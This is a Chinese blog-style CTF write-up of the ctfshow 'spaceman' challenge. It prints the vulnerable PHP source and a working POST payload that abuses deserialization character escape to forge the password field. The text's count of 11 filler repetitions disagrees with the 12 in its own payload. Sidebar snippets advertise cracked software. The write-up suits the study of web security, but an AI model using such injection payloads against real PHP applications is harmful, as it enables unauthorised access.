spaceman

最新推荐文章于 2022-08-23 14:21:34 发布
最新推荐文章于 2022-08-23 14:21:34 发布
阅读量177 收藏
点赞数
分类专栏: 反序列化字符逃逸
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43774856/article/details/113769409
版权

spaceman

源码如下所示

<?php
error_reporting(0);
highlight_file(__FILE__);
class spaceman
{
    public $username;
    public $password;
    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
    public function __wakeup()
    {
        if($this->password==='ctfshowvip')
        {
            include("flag.php");
            echo $flag;    
        }
        else
        {
            echo 'wrong password';
        }
    }
}
function filter($string){
    return str_replace('ctfshowup','ctfshow',$string);
}
$str = file_get_contents("php://input");
if(preg_match('/\_|\.|\]|\[/is',$str)){            
    die("I am sorry but you have to leave.");
}else{
    extract($_POST);
}
$ser = filter(serialize(new spaceman($user_name,$pass_word)));
$test = unserialize($ser);
?>

可以看到,是反序列化字符逃逸,这里是字符减少的情况,一个对象经过序列化之后的格式为:

O:类名的长度:类名:类里包含的变量个数:{类型:长度:值;类型:长度:值…}

每替换一次,字符串长度减少2
后面要传入1";s:8:"password";s:10:"ctfshowvip,也就是要把s:8:"password";s:36:"1这24个字符吞掉,所以需要传11个ctfshowup
这里预期的序列化后的内容

O:8:"spaceman":2:{s:8:"username";s:4:"xxxx";s:8:"password";s:10:"ctfshowvip";}

最终payload:

POST:
user name=ctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowup&pass word=1";s:8:"password";s:10:"ctfshowvip

最后得到flag
在这里插入图片描述

yjj哈哈哈
关注
专栏目录
PHP渗透测试题目笔记
Zeker62的博客
02-10 5664
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
Windows11系统spaceman.exe文件丢失问题
最新发布
amio555的专栏
05-15 332
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个spaceman.exe文件(挑选合适的版本文件)把它放入到程序或系统目录,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现spaceman.exe丢失要怎么解决?
PHP反序列化字符逃逸
m0re's blog
11-15 1188
前言 反序列化字符逃逸是最近很常见的题目,所以学习一下这个方面的知识,
ez_serialize复现
Sk1y的博客
10-13 605
文章目录解题过程 解题过程 题目给了源码 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer";
PHP代码审计8—SSRF 漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-02 1895
SSRF基础学习
SpaceMan文件去重
04-12
标题“SpaceMan文件去重”指的是一个专门针对Windows操作系统设计的工具,用于查找并管理重复文件。这个工具可能采用高效算法来对比文件内容,帮助用户识别和清理占用磁盘空间的重复文件,从而优化存储资源。 在...
Spaceman.rar
01-03
Spaceman.rar》压缩包的素材集合是一个丰富的多媒体资源库,主要围绕“太空人”这一主题展开。这个包包含了多种格式的图像和动画文件,适用于各种创意设计、媒体制作或者教育用途。以下是对各类型文件及其应用的...
SpaceMan-开源
05-01
SpaceMan开源项目详解】 SpaceMan是一款开源的文件和文件夹大小查看工具,它为用户提供了一个直观的方式来管理和了解计算机上各个文件及文件夹所占用的空间情况。在日常使用计算机时,我们经常需要清理磁盘空间,...
查找重复文件及文件夹(SpaceMan) v99 汉化版.zip
07-14
SpaceMan 99 汉化版是理想的工具来帮助整理您的磁盘。在你的磁盘上这很容易就查找出大量的重复的文件。当你从一个地方复制文件和文件夹到的地方会发生这种情况,或者如果你从网上下载同一文件多次。SpaceMan 99 汉化...
SpaceMan 99(查找重复文件)汉化版.rar
09-05
SpaceMan 99能够从你的电脑硬盘查找重复的文件及文件夹,帮助你整理磁盘,找出那些大量的重复文件,可以帮助你删除不需要的重复文件来节省电脑硬盘空间。这个是特别版,用户名和注册码可以任意输入。
重复文件夹查找工具SpaceMan4.0破解版.rar
09-04
软件介绍: 安装后打开SpaceMan 99 4.0,可以输入任意注册码都成注册成功。电脑使用的时间越久,里面储存的文件也就越多,有很多时候,里面有许多重复的文件和文件夹,重复的内容不仅无用而且还占用磁盘空间,这时你就需要一款强力的重复文件查找工具,它是用来查找重复文件/文件夹的最无佳工具,通过对文件进行字节的比较来确定文件是否是重复的,此算法可以保证查找到的重复文件绝对是一模一样的。还可以删除空的文件夹。查找到的重复的文件首先会被标记,在你审查确认后可以直接删除,发送到回收站等,你也可以随时撤消删除。
ctfshow—SSRF详解
cosmoslin的博客
09-24 1346
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
php反序列化之字符逃逸
qq_53856457的博客
05-14 1854
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
PHP反序列化魔术方法
qq_60463414的博客
08-23 2585
php反序列化漏洞魔术方法
DASCTF
qq_53755216的博客
04-08 852
ez_serialize 题目网址: http://684f47cd-5c9d-41cb-ad29-98d48096cc9a.machine.dasctf.com/ <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $thi
CTF刷题
qq_45655136的博客
08-05 6682
刷题网站:bugku;BUUCTF 本文记录了在刷题过程所学到的知识点 坚持每天刷5道题,持续更新 坚持就是胜利鸭 CTF 1、bugku–Simple_SSLI_1 根据题目SSLI即服务端模板注入攻击,服务段接收用户输入,将其作为web应用模板的一部分,渲染编译后执行恶意内容,导致敏感信息泄露、代码执行等。 直接F12,发现提示in the flask,set a secret_key flask模板,config是flask模板的一个全局对象,包含了所有应用程序的配置值。 然后在url输入/?fl
2021-DASCTF-三月赛-Writeup
热门推荐
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒赛高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
[CTFSHOW]反序列化
Huamang的博客
04-27 1144
web257 <?php error_reporting(0); highlight_file(__FILE__); class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->c
CTFSHOW-PHP反序列化
Monica的博客
09-24 2896
WEB254 题目: <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->
个人技术博客: spaceman35.github.io 的构建探索
资源摘要信息:"spaceman35.github.io是一个个人创建的网站,它展示了个人的技术成果和专业知识。从标题可以看出,这个网站的域名是spaceman35.github.io,而描述则透露了这个网站背后的创建者seankelly.space以及其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值